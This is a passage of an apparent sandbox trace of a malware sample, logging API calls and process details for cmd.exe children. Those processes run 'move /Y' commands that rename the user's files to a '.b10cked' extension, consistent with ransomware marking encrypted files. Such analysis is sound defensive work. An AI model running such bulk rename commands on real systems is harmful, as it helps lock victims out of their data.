_MaxCount=0x7) returned -18 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0232.064] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0232.064] _wcsicmp (_String1="LUKOKO~1.PNG", _String2=".") returned 62 [0232.064] _wcsicmp (_String1="LUKOKO~1.PNG", _String2="..") returned 62 [0232.064] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOKO~1.PNG" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\lukoko~1.png")) returned 0x20 [0232.064] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x451eb0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.064] SetErrorMode (uMode=0x0) returned 0x0 [0232.064] SetErrorMode (uMode=0x1) returned 0x0 [0232.064] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOKO~1.PNG", nBufferLength=0x104, lpBuffer=0x24f1a4, lpFilePart=0x24f18c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOKO~1.PNG", lpFilePart=0x24f18c*="LUKOKO~1.PNG") returned 0x33 [0232.064] SetErrorMode (uMode=0x0) returned 0x1 [0232.064] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00")) returned 0x12 [0232.065] _wcsicmp (_String1="LUKOKO~1.PNG", _String2=".") returned 62 [0232.065] _wcsicmp (_String1="LUKOKO~1.PNG", _String2="..") returned 62 [0232.065] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOKO~1.PNG" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\lukoko~1.png")) returned 0x20 [0232.065] SetErrorMode (uMode=0x0) returned 0x0 [0232.065] SetErrorMode (uMode=0x1) returned 0x0 [0232.065] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOKO~1.PNG", nBufferLength=0x104, lpBuffer=0x24f620, lpFilePart=0x24f3b8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOKO~1.PNG", lpFilePart=0x24f3b8*="LUKOKO~1.PNG") returned 0x33 [0232.065] SetErrorMode (uMode=0x0) returned 0x1 [0232.065] SetErrorMode (uMode=0x0) returned 0x0 [0232.065] SetErrorMode (uMode=0x1) returned 0x0 [0232.065] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOkovEeIsTMf0.png.b10cked", nBufferLength=0x104, lpBuffer=0x24f828, lpFilePart=0x24f3b8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOkovEeIsTMf0.png.b10cked", lpFilePart=0x24f3b8*="LUKOkovEeIsTMf0.png.b10cked") returned 0x42 [0232.065] SetErrorMode (uMode=0x0) returned 0x1 [0232.065] SetLastError (dwErrCode=0x0) [0232.065] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOkovEeIsTMf0.png.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\lukokoveeistmf0.png.b10cked")) returned 0xffffffff [0232.065] GetLastError () returned 0x2 [0232.066] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOKO~1.PNG", fInfoLevelId=0x1, lpFindFileData=0x24ed34, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ed34) returned 0x440f18 [0232.066] FindNextFileW (in: hFindFile=0x440f18, lpFindFileData=0x24ed34 | out: lpFindFileData=0x24ed34) returned 0 [0232.066] GetLastError () returned 0x12 [0232.066] FindClose (in: hFindFile=0x440f18 | out: hFindFile=0x440f18) returned 1 [0232.068] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOKO~1.PNG", fInfoLevelId=0x1, lpFindFileData=0x451c50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x451c50) returned 0x440f18 [0232.068] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOkovEeIsTMf0.png.b10cked", nBufferLength=0x104, lpBuffer=0x24efcc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOkovEeIsTMf0.png.b10cked", lpFilePart=0x0) returned 0x42 [0232.068] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOkovEeIsTMf0.png", nBufferLength=0x104, lpBuffer=0x24efcc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOkovEeIsTMf0.png", lpFilePart=0x0) returned 0x3a [0232.068] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOkovEeIsTMf0.png" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\lukokoveeistmf0.png")) returned 0x20 [0232.068] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOkovEeIsTMf0.png" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\lukokoveeistmf0.png"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOkovEeIsTMf0.png.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\lukokoveeistmf0.png.b10cked"), dwFlags=0x3) returned 1 [0232.071] FindClose (in: hFindFile=0x440f18 | out: hFindFile=0x440f18) returned 1 [0232.072] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x24ef80 | out: _Buffer=" 1") returned 9 [0232.072] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.072] GetFileType (hFile=0x7) returned 0x2 [0232.144] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0232.144] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24ef0c | out: lpMode=0x24ef0c) returned 1 [0232.145] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.145] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x24ef40 | out: lpConsoleScreenBufferInfo=0x24ef40) returned 1 [0232.146] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0232.147] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x24ef80 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0232.147] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x24ef64, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x24ef64*=0x1a) returned 1 [0232.149] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.149] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.174] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.174] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0232.175] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.175] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0232.176] SetConsoleInputExeNameW () returned 0x1 [0232.176] GetConsoleOutputCP () returned 0x1b5 [0232.177] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.177] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.190] exit (_Code=0) Process: id = "608" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16640" os_pid = "0xc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9RC~1.AVI\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9rCEqmjhd9gNfz.avi.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34355 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34356 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34357 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34358 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 34359 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34360 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34361 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34362 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34363 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 34364 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34595 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34596 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34597 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34598 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 34599 start_va = 0x490000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 34600 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34601 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34602 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34603 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34604 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34605 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34606 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34607 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34608 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34699 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 34700 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34701 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34702 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 34703 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 34704 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 34705 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 34706 start_va = 0x2f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 34707 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 34708 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Thread: id = 846 os_tid = 0x7b8 [0231.862] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2eff74 | out: lpSystemTimeAsFileTime=0x2eff74*(dwLowDateTime=0xbdc1bba0, dwHighDateTime=0x1d440a9)) [0231.862] GetCurrentProcessId () returned 0xc4 [0231.862] GetCurrentThreadId () returned 0x7b8 [0231.862] GetTickCount () returned 0x3fcd4 [0231.862] QueryPerformanceCounter (in: lpPerformanceCount=0x2eff6c | out: lpPerformanceCount=0x2eff6c*=28865152878) returned 1 [0231.863] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0231.863] __set_app_type (_Type=0x1) [0231.863] __p__fmode () returned 0x76b331f4 [0231.863] __p__commode () returned 0x76b331fc [0231.863] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0231.863] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0231.864] GetCurrentThreadId () returned 0x7b8 [0231.864] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7b8) returned 0x38 [0231.864] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0231.864] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0231.864] SetThreadUILanguage (LangId=0x0) returned 0x409 [0231.921] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0231.921] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2eff04 | out: phkResult=0x2eff04*=0x0) returned 0x2 [0231.921] VirtualQuery (in: lpAddress=0x2eff3b, lpBuffer=0x2efed4, dwLength=0x1c | out: lpBuffer=0x2efed4*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.921] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efed4, dwLength=0x1c | out: lpBuffer=0x2efed4*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0231.921] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efed4, dwLength=0x1c | out: lpBuffer=0x2efed4*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0231.921] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efed4, dwLength=0x1c | out: lpBuffer=0x2efed4*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.921] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efed4, dwLength=0x1c | out: lpBuffer=0x2efed4*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0231.921] GetConsoleOutputCP () returned 0x1b5 [0231.924] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.924] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0231.924] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.924] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0231.926] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.926] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0231.927] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.927] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0231.928] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.928] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0231.930] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.930] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0231.942] GetEnvironmentStringsW () returned 0x4a01c8* [0231.942] FreeEnvironmentStringsW (penv=0x4a01c8) returned 1 [0231.942] GetEnvironmentStringsW () returned 0x4a01c8* [0231.942] FreeEnvironmentStringsW (penv=0x4a01c8) returned 1 [0231.942] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eee74 | out: phkResult=0x2eee74*=0x40) returned 0x0 [0231.942] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eee7c, lpData=0x2eee80, lpcbData=0x2eee78*=0x1000 | out: lpType=0x2eee7c*=0x0, lpData=0x2eee80*=0x0, lpcbData=0x2eee78*=0x1000) returned 0x2 [0231.942] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eee7c, lpData=0x2eee80, lpcbData=0x2eee78*=0x1000 | out: lpType=0x2eee7c*=0x4, lpData=0x2eee80*=0x1, lpcbData=0x2eee78*=0x4) returned 0x0 [0231.942] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eee7c, lpData=0x2eee80, lpcbData=0x2eee78*=0x1000 | out: lpType=0x2eee7c*=0x0, lpData=0x2eee80*=0x1, lpcbData=0x2eee78*=0x1000) returned 0x2 [0231.942] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eee7c, lpData=0x2eee80, lpcbData=0x2eee78*=0x1000 | out: lpType=0x2eee7c*=0x4, lpData=0x2eee80*=0x0, lpcbData=0x2eee78*=0x4) returned 0x0 [0231.942] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eee7c, lpData=0x2eee80, lpcbData=0x2eee78*=0x1000 | out: lpType=0x2eee7c*=0x4, lpData=0x2eee80*=0x40, lpcbData=0x2eee78*=0x4) returned 0x0 [0231.942] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eee7c, lpData=0x2eee80, lpcbData=0x2eee78*=0x1000 | out: lpType=0x2eee7c*=0x4, lpData=0x2eee80*=0x40, lpcbData=0x2eee78*=0x4) returned 0x0 [0231.943] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eee7c, lpData=0x2eee80, lpcbData=0x2eee78*=0x1000 | out: lpType=0x2eee7c*=0x0, lpData=0x2eee80*=0x40, lpcbData=0x2eee78*=0x1000) returned 0x2 [0231.943] RegCloseKey (hKey=0x40) returned 0x0 [0231.943] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eee74 | out: phkResult=0x2eee74*=0x40) returned 0x0 [0231.943] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eee7c, lpData=0x2eee80, lpcbData=0x2eee78*=0x1000 | out: lpType=0x2eee7c*=0x0, lpData=0x2eee80*=0x40, lpcbData=0x2eee78*=0x1000) returned 0x2 [0231.943] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eee7c, lpData=0x2eee80, lpcbData=0x2eee78*=0x1000 | out: lpType=0x2eee7c*=0x4, lpData=0x2eee80*=0x1, lpcbData=0x2eee78*=0x4) returned 0x0 [0231.943] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eee7c, lpData=0x2eee80, lpcbData=0x2eee78*=0x1000 | out: lpType=0x2eee7c*=0x0, lpData=0x2eee80*=0x1, lpcbData=0x2eee78*=0x1000) returned 0x2 [0231.943] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eee7c, lpData=0x2eee80, lpcbData=0x2eee78*=0x1000 | out: lpType=0x2eee7c*=0x4, lpData=0x2eee80*=0x0, lpcbData=0x2eee78*=0x4) returned 0x0 [0231.943] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eee7c, lpData=0x2eee80, lpcbData=0x2eee78*=0x1000 | out: lpType=0x2eee7c*=0x4, lpData=0x2eee80*=0x9, lpcbData=0x2eee78*=0x4) returned 0x0 [0231.943] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eee7c, lpData=0x2eee80, lpcbData=0x2eee78*=0x1000 | out: lpType=0x2eee7c*=0x4, lpData=0x2eee80*=0x9, lpcbData=0x2eee78*=0x4) returned 0x0 [0231.943] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eee7c, lpData=0x2eee80, lpcbData=0x2eee78*=0x1000 | out: lpType=0x2eee7c*=0x0, lpData=0x2eee80*=0x9, lpcbData=0x2eee78*=0x1000) returned 0x2 [0231.943] RegCloseKey (hKey=0x40) returned 0x0 [0231.943] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863bf [0231.943] srand (_Seed=0x5b8863bf) [0231.943] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9RC~1.AVI\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9rCEqmjhd9gNfz.avi.b10cked\"" [0231.943] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9RC~1.AVI\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9rCEqmjhd9gNfz.avi.b10cked\"" [0231.943] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.944] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4a1928, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0231.944] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0231.944] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0231.944] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.944] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0231.944] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0231.944] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0231.944] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0231.944] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0231.944] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0231.944] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0231.944] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0231.944] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0231.945] GetEnvironmentStringsW () returned 0x4a2318* [0231.945] FreeEnvironmentStringsW (penv=0x4a2318) returned 1 [0231.945] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.945] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.945] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0231.945] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0231.945] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0231.945] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0231.945] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0231.945] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0231.945] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0231.945] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0231.945] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2efc40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.945] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2efc40, lpFilePart=0x2efc3c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2efc3c*="Desktop") returned 0x18 [0231.945] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: 